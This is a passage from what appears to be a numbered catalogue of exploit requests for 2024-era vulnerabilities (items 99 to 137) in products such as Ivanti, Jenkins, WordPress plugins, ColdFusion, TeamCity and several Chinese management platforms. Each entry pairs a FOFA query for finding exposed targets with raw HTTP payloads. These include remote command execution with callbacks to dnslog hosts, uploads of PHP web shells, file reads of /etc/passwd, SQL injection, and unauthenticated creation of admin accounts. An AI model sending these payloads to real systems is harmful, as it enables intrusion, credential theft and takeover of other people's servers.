User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart S42 Management Platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 Management Platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan Engineering Quality Inspection System arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG Application Security Gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun Communication Command and Dispatch Platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
